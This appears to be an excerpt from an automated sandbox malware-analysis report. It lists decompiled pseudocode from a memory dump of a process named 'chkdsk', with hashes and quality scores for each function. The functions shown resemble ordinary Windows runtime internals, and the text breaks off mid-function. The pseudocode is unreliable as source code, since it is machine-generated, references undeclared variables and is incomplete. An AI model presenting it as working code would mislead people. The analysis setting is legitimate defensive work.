                                                      • Opcode Fuzzy Hash: 50fc8dd8bbb5cf760fc32bc5a39c934832f7ab9f7d15bcf1dc3fb76872f61213
                                                      • Instruction Fuzzy Hash: 9401F4B2701204AFE314AF15D840B3977E9FB41325F2140AAE145DBBA5C374FC41CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E04E54015(signed int __eax, signed int __ecx) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed char _t10;
                                                      				signed int _t28;
                                                      
                                                      				_push(__ecx);
                                                      				_t28 = __ecx;
                                                      				asm("lock xadd [edi+0x24], eax");
                                                      				_t10 = (__eax | 0xffffffff) - 1;
                                                      				if(_t10 == 0) {
                                                      					_t1 = _t28 + 0x1c; // 0x1e
                                                      					E04DA2280(_t10, _t1);
                                                      					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                      					E04DA2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4e786ac);
                                                      					E04D8F900(0x4e786d4, _t28);
                                                      					E04D9FFB0(0x4e786ac, _t28, 0x4e786ac);
                                                      					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                      					E04D9FFB0(0, _t28, _t1);
                                                      					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                      					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                      						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                      					}
                                                      					_t10 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                      				}
                                                      				return _t10;
                                                      			}








                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ba06f03109fcb462bd26f2618e17b8a75805669dd9e3168dcd7800610da74e4
                                                      • Instruction ID: b2ea46947fbfeb769b6d6c0312d21072fbae7b4a85f4b446f3ef11ce57d97a9a
                                                      • Opcode Fuzzy Hash: 9ba06f03109fcb462bd26f2618e17b8a75805669dd9e3168dcd7800610da74e4
                                                      • Instruction Fuzzy Hash: F5017C723019457FE711BF6ACD84E67B7ACFB45668B000669B508C3A61CB24FC61CAF4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E04E414FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				short _v54;
                                                      				char _v60;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed char* _t21;
                                                      				intOrPtr _t27;
                                                      				intOrPtr _t33;
                                                      				intOrPtr _t34;
                                                      				signed int _t35;
                                                      
                                                      				_t32 = __edx;
                                                      				_t27 = __ebx;
                                                      				_v8 =  *0x4e7d360 ^ _t35;
                                                      				_t33 = __edx;
                                                      				_t34 = __ecx;
                                                      				E04DCFA60( &_v60, 0, 0x30);
                                                      				_v20 = _a4;
                                                      				_v16 = _a8;
                                                      				_v28 = _t34;
                                                      				_v24 = _t33;
                                                      				_v54 = 0x1034;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t21 = 0x7ffe0388;
                                                      				} else {
                                                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      				}
                                                      				_push( &_v60);
                                                      				_push(0x10);
                                                      				_push(0x20402);
                                                      				_push( *_t21 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                      			}


















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 921d4546a4b712eb50647720c0daea1c960cc5fea329eed9ad6a692f2662abfe
                                                      • Instruction ID: 64fdd7751c913952b7ea5be7a167e8400185290603bbb8f007e15a6b049568b6
                                                      • Opcode Fuzzy Hash: 921d4546a4b712eb50647720c0daea1c960cc5fea329eed9ad6a692f2662abfe
                                                      • Instruction Fuzzy Hash: 7C019271E00248AFDB00DFA9D845FEEB7B8EF44714F00405AF904EB280D674EA40CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E04E4138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				short _v54;
                                                      				char _v60;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed char* _t21;
                                                      				intOrPtr _t27;
                                                      				intOrPtr _t33;
                                                      				intOrPtr _t34;
                                                      				signed int _t35;
                                                      
                                                      				_t32 = __edx;
                                                      				_t27 = __ebx;
                                                      				_v8 =  *0x4e7d360 ^ _t35;
                                                      				_t33 = __edx;
                                                      				_t34 = __ecx;
                                                      				E04DCFA60( &_v60, 0, 0x30);
                                                      				_v20 = _a4;
                                                      				_v16 = _a8;
                                                      				_v28 = _t34;
                                                      				_v24 = _t33;
                                                      				_v54 = 0x1033;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t21 = 0x7ffe0388;
                                                      				} else {
                                                      					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      				}
                                                      				_push( &_v60);
                                                      				_push(0x10);
                                                      				_push(0x20402);
                                                      				_push( *_t21 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                      			}


















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c821e15502262830f3777981ad6cb5b2a97c5b5bbcc4c9bd440bff7a1eb00fd8
                                                      • Instruction ID: cd7a4df89d9c06679d7cdd0c5044df8ecbb65e9661e66dd613e277adc3db4e90
                                                      • Opcode Fuzzy Hash: c821e15502262830f3777981ad6cb5b2a97c5b5bbcc4c9bd440bff7a1eb00fd8
                                                      • Instruction Fuzzy Hash: E0015271A04318AFDB14DFA9D845FAEB7B8EF44714F01405AF904EB280D674EA51CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E04D858EC(intOrPtr __ecx) {
                                                      				signed int _v8;
                                                      				char _v28;
                                                      				char _v44;
                                                      				char _v76;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t17;
                                                      				intOrPtr _t27;
                                                      				intOrPtr _t28;
                                                      				signed int _t29;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t29;
                                                      				_t10 =  *[fs:0x30];
                                                      				_t27 = __ecx;
                                                      				if(_t10 == 0) {
                                                      					L6:
                                                      					_t28 = 0x4d65c80;
                                                      				} else {
                                                      					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                      					if(_t16 == 0) {
                                                      						goto L6;
                                                      					} else {
                                                      						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                      					}
                                                      				}
                                                      				if(E04D85943() != 0 &&  *0x4e75320 > 5) {
                                                      					E04E07B5E( &_v44, _t27);
                                                      					_t22 =  &_v28;
                                                      					E04E07B5E( &_v28, _t28);
                                                      					_t11 = E04E07B9C(0x4e75320, 0x4d6bf15,  &_v28, _t22, 4,  &_v76);
                                                      				}
                                                      				return E04DCB640(_t11, _t17, _v8 ^ _t29, 0x4d6bf15, _t27, _t28);
                                                      			}
















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74ae117821cdb0e531fe477b5126a12b203f3bf3f0291e4abd48d28b14fdabc2
                                                      • Instruction ID: 8339ffa6d59375c1fda73b6338bb0d853f86ecfe0ca96bfd4171696092614942
                                                      • Opcode Fuzzy Hash: 74ae117821cdb0e531fe477b5126a12b203f3bf3f0291e4abd48d28b14fdabc2
                                                      • Instruction Fuzzy Hash: C0018431B10104BBE714FB25E811ABE7BBDEF45634B95406D9815AB694DE30FD018690
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 59%
                                                      			E04E3FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				signed int _v12;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				short _v58;
                                                      				char _v64;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed char* _t18;
                                                      				intOrPtr _t24;
                                                      				intOrPtr _t30;
                                                      				intOrPtr _t31;
                                                      				signed int _t32;
                                                      
                                                      				_t29 = __edx;
                                                      				_t24 = __ebx;
                                                      				_v12 =  *0x4e7d360 ^ _t32;
                                                      				_t30 = __edx;
                                                      				_t31 = __ecx;
                                                      				E04DCFA60( &_v64, 0, 0x30);
                                                      				_v24 = _a4;
                                                      				_v32 = _t31;
                                                      				_v28 = _t30;
                                                      				_v58 = 0x266;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t18 = 0x7ffe0388;
                                                      				} else {
                                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      				}
                                                      				_push( &_v64);
                                                      				_push(0x10);
                                                      				_push(0x20402);
                                                      				_push( *_t18 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                      			}

















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84c7cb3f8535d7bf54b8436eb4be8e291e70b5d05dffd528a1782426ed316ec6
                                                      • Instruction ID: 3423e31c4992fa9b6f5c0a5969741bd7bf7ae5bd4136ff2e84ae12229d798a67
                                                      • Opcode Fuzzy Hash: 84c7cb3f8535d7bf54b8436eb4be8e291e70b5d05dffd528a1782426ed316ec6
                                                      • Instruction Fuzzy Hash: 69018471F00209ABDB14DBA9D845FAEB7B8EF44714F00406AF900EB380EA74EA11C7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 59%
                                                      			E04E3FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				signed int _v12;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				short _v58;
                                                      				char _v64;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed char* _t18;
                                                      				intOrPtr _t24;
                                                      				intOrPtr _t30;
                                                      				intOrPtr _t31;
                                                      				signed int _t32;
                                                      
                                                      				_t29 = __edx;
                                                      				_t24 = __ebx;
                                                      				_v12 =  *0x4e7d360 ^ _t32;
                                                      				_t30 = __edx;
                                                      				_t31 = __ecx;
                                                      				E04DCFA60( &_v64, 0, 0x30);
                                                      				_v24 = _a4;
                                                      				_v32 = _t31;
                                                      				_v28 = _t30;
                                                      				_v58 = 0x267;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t18 = 0x7ffe0388;
                                                      				} else {
                                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      				}
                                                      				_push( &_v64);
                                                      				_push(0x10);
                                                      				_push(0x20402);
                                                      				_push( *_t18 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc10631af017f2cb80575dc2e8a6c66f4de8b0ce71ffe86ee736867e7860fecf
                                                      • Instruction ID: fa086651b7635640094fb2047ce56e8725cd846d0486efb19775aef14df39018
                                                      • Opcode Fuzzy Hash: fc10631af017f2cb80575dc2e8a6c66f4de8b0ce71ffe86ee736867e7860fecf
                                                      • Instruction Fuzzy Hash: 0E018471F00209ABDB14DFA9D845FAFB7B8EF44714F00406AF900EB281DA74E911C7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04E51074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                      				char _v8;
                                                      				void* _v11;
                                                      				unsigned int _v12;
                                                      				void* _v15;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				char* _t16;
                                                      				signed int* _t35;
                                                      
                                                      				_t22 = __ebx;
                                                      				_t35 = __ecx;
                                                      				_v8 = __edx;
                                                      				_t13 =  !( *__ecx) + 1;
                                                      				_v12 =  !( *__ecx) + 1;
                                                      				if(_a4 != 0) {
                                                      					E04E5165E(__ebx, 0x4e78ae4, (__edx -  *0x4e78b04 >> 0x14) + (__edx -  *0x4e78b04 >> 0x14), __edi, __ecx, (__edx -  *0x4e78b04 >> 0x14) + (__edx -  *0x4e78b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                      				}
                                                      				E04E4AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                      				if(E04DA7D50() == 0) {
                                                      					_t16 = 0x7ffe0388;
                                                      				} else {
                                                      					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      				}
                                                      				if( *_t16 != 0) {
                                                      					_t16 = E04E3FE3F(_t22, _t35, _v8, _v12);
                                                      				}
                                                      				return _t16;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e71c27871bbae7ae3aba982fa723ac6508b8d0545f7f7cd6d2d8dc184cb91bd
                                                      • Instruction ID: 1d19ce359579939b9135d547718d7d9952d0949f00e33cd9794c7657ae814985
                                                      • Opcode Fuzzy Hash: 4e71c27871bbae7ae3aba982fa723ac6508b8d0545f7f7cd6d2d8dc184cb91bd
                                                      • Instruction Fuzzy Hash: 5F012872A047419BD711EB29C804B1AB7D5AB84318F049629FC85832A0EE70F840CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D9B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                      				signed char _t11;
                                                      				signed char* _t12;
                                                      				intOrPtr _t24;
                                                      				signed short* _t25;
                                                      
                                                      				_t25 = __edx;
                                                      				_t24 = __ecx;
                                                      				_t11 = ( *[fs:0x30])[0x50];
                                                      				if(_t11 != 0) {
                                                      					if( *_t11 == 0) {
                                                      						goto L1;
                                                      					}
                                                      					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                      					L2:
                                                      					if( *_t12 != 0) {
                                                      						_t12 =  *[fs:0x30];
                                                      						if((_t12[0x240] & 0x00000004) == 0) {
                                                      							goto L3;
                                                      						}
                                                      						if(E04DA7D50() == 0) {
                                                      							_t12 = 0x7ffe0385;
                                                      						} else {
                                                      							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                      						}
                                                      						if(( *_t12 & 0x00000020) == 0) {
                                                      							goto L3;
                                                      						}
                                                      						return E04E07016(_a4, _t24, 0, 0, _t25, 0);
                                                      					}
                                                      					L3:
                                                      					return _t12;
                                                      				}
                                                      				L1:
                                                      				_t12 = 0x7ffe0384;
                                                      				goto L2;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction ID: 4da8150dd922693a7a1ce25fd90d939b2e7a584daddbbcd5df027eed07f353e9
                                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction Fuzzy Hash: 9E018431304980EFD722D75ED984F7677D8FB46754F0A40A6F919CB651E668FC40C620
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E04E58ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				short _v62;
                                                      				char _v68;
                                                      				signed char* _t29;
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t41;
                                                      				intOrPtr _t42;
                                                      				signed int _t43;
                                                      
                                                      				_t40 = __edx;
                                                      				_v8 =  *0x4e7d360 ^ _t43;
                                                      				_v28 = __ecx;
                                                      				_v62 = 0x1c2a;
                                                      				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                      				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                      				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                      				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                      				_v24 = __edx;
                                                      				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t29 = 0x7ffe0386;
                                                      				} else {
                                                      					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      				}
                                                      				_push( &_v68);
                                                      				_push(0x1c);
                                                      				_push(0x20402);
                                                      				_push( *_t29 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fac5d2d2fe3a769f9a1fb14bb30b62ec8945d2c14d5a9cb7b31783b67c539d0
                                                      • Instruction ID: 41b206d3305fbf45346cf1556cbcf5655758a81310a1ef5b1d382b48727afaec
                                                      • Opcode Fuzzy Hash: 2fac5d2d2fe3a769f9a1fb14bb30b62ec8945d2c14d5a9cb7b31783b67c539d0
                                                      • Instruction Fuzzy Hash: 5511CC70A002599FDB04DFA9D541BAEB7F4FF08304F1442AAE919EB791E634A940CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E04E58A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v12;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				short _v66;
                                                      				char _v72;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed char* _t18;
                                                      				signed int _t32;
                                                      
                                                      				_t29 = __edx;
                                                      				_v12 =  *0x4e7d360 ^ _t32;
                                                      				_t31 = _a8;
                                                      				_t30 = _a12;
                                                      				_v66 = 0x1c20;
                                                      				_v40 = __ecx;
                                                      				_v36 = __edx;
                                                      				_v32 = _a4;
                                                      				_v28 = _a8;
                                                      				_v24 = _a12;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t18 = 0x7ffe0386;
                                                      				} else {
                                                      					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                      				}
                                                      				_push( &_v72);
                                                      				_push(0x14);
                                                      				_push(0x20402);
                                                      				_push( *_t18 & 0x000000ff);
                                                      				return E04DCB640(E04DC9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73bf9626d5d22c9675c9eb8baf2184808ed0db87ac386b2e1db3a2db2eb94ab9
                                                      • Instruction ID: c82c6fbc75ef70fb91692048836df356eeace8bc3dfaa05a98faef7d83d13d03
                                                      • Opcode Fuzzy Hash: 73bf9626d5d22c9675c9eb8baf2184808ed0db87ac386b2e1db3a2db2eb94ab9
                                                      • Instruction Fuzzy Hash: 24012CB1A0021DAFDB00EFA9D9419EEB7B8FF48354F10405AF904FB351E634A910CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D8DB60(signed int __ecx) {
                                                      				intOrPtr* _t9;
                                                      				void* _t12;
                                                      				void* _t13;
                                                      				intOrPtr _t14;
                                                      
                                                      				_t9 = __ecx;
                                                      				_t14 = 0;
                                                      				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                      					_t13 = 0xc000000d;
                                                      				} else {
                                                      					_t14 = E04D8DB40();
                                                      					if(_t14 == 0) {
                                                      						_t13 = 0xc0000017;
                                                      					} else {
                                                      						_t13 = E04D8E7B0(__ecx, _t12, _t14, 0xfff);
                                                      						if(_t13 < 0) {
                                                      							L04D8E8B0(__ecx, _t14, 0xfff);
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                      							_t14 = 0;
                                                      						} else {
                                                      							_t13 = 0;
                                                      							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                      						}
                                                      					}
                                                      				}
                                                      				 *_t9 = _t14;
                                                      				return _t13;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction ID: f8bf4ec4f2ea1561289446d12dba175897ad18b28192c6a9032ab015121f1195
                                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                      • Instruction Fuzzy Hash: 81F068333415229BE7727A558880F7BB6B7DFC2A64F16003DB1059B2C4D970FC0296E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E04D8B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                      				signed char* _t13;
                                                      				intOrPtr _t22;
                                                      				char _t23;
                                                      
                                                      				_t23 = __edx;
                                                      				_t22 = __ecx;
                                                      				if(E04DA7D50() != 0) {
                                                      					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                      				} else {
                                                      					_t13 = 0x7ffe0384;
                                                      				}
                                                      				if( *_t13 != 0) {
                                                      					_t13 =  *[fs:0x30];
                                                      					if((_t13[0x240] & 0x00000004) == 0) {
                                                      						goto L3;
                                                      					}
                                                      					if(E04DA7D50() == 0) {
                                                      						_t13 = 0x7ffe0385;
                                                      					} else {
                                                      						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                      					}
                                                      					if(( *_t13 & 0x00000020) == 0) {
                                                      						goto L3;
                                                      					}
                                                      					return E04E07016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                      				} else {
                                                      					L3:
                                                      					return _t13;
                                                      				}
                                                      			}







                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction ID: 519229dc87a810e11ba1e5572f9fffc988f7b015b03c970f9a20b99f2cef0d6b
                                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                      • Instruction Fuzzy Hash: 0C01D132300680DBD722A75AC804F797B99FF51768F0940A6F9548B6B1E679F800D224
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E04E1FE87(intOrPtr __ecx) {
                                                      				signed int _v8;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				signed int _v24;
                                                      				intOrPtr _v28;
                                                      				short _v54;
                                                      				char _v60;
                                                      				signed char* _t21;
                                                      				intOrPtr _t27;
                                                      				intOrPtr _t32;
                                                      				intOrPtr _t33;
